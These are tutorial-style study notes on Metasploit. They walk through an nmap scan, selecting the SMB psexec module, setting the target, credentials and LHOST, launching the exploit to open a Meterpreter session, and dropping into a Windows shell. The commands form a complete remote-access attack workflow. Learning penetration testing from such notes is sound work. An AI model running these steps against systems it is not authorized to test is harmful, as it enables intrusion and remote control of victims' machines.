Metasploit Payloads

Here are your notes on Automating Payloads & Delivery with Metasploit 🛠️💥:

---

🧠 What is Metasploit?

• Metasploit Framework is an open-source tool by Rapid7 for automating exploitation of vulnerabilities.

• It includes:

  • 2000+ exploits

  • 500+ payloads

  • Tools for scanning, exploitation, post-exploitation, and evasion.

• Meterpreter is the default payload in many exploit modules, offering extended control over the target system.

---

🚀 Starting Metasploit

sudo msfconsole

• ASCII art banner and module stats are displayed.

• Modules include exploits, payloads, auxiliary tools, encoders, and more.

---

🔍 Target Discovery with Nmap

nmap -sC -sV -Pn <target-ip>

• Example target ports:

  • 135: MS RPC

  • 139: NetBIOS-SSN

  • 445: Microsoft-DS (SMB)

• Useful info includes OS fingerprinting and SMB security modes.

---

🕵️‍♂️ Searching for SMB Exploits

search smb

• Use the numbered list (e.g., use 56) to select a module.

• Example: exploit/windows/smb/psexec

  • Exploits SMB using valid credentials to deliver a Meterpreter payload.

---

⚙️ Module Configuration

Use options to list configurable parameters.

set RHOSTS <target-ip>
set SHARE ADMIN$
set SMBUser <username>
set SMBPass <password>
set LHOST <your-ip>

• RHOSTS: Target system IP

• SHARE: ADMIN$ by default

• LHOST: Your attack box IP

---

💣 Launching the Exploit

exploit

• MSF reports each step: connecting, authenticating, selecting payload, delivering shell

• Success shown by Meterpreter session opening:

meterpreter >

---

🖥️ Working with Meterpreter

• ? or help: Shows available commands

• shell: Drops into native system shell

meterpreter > shell

C:\WINDOWS\system32>

---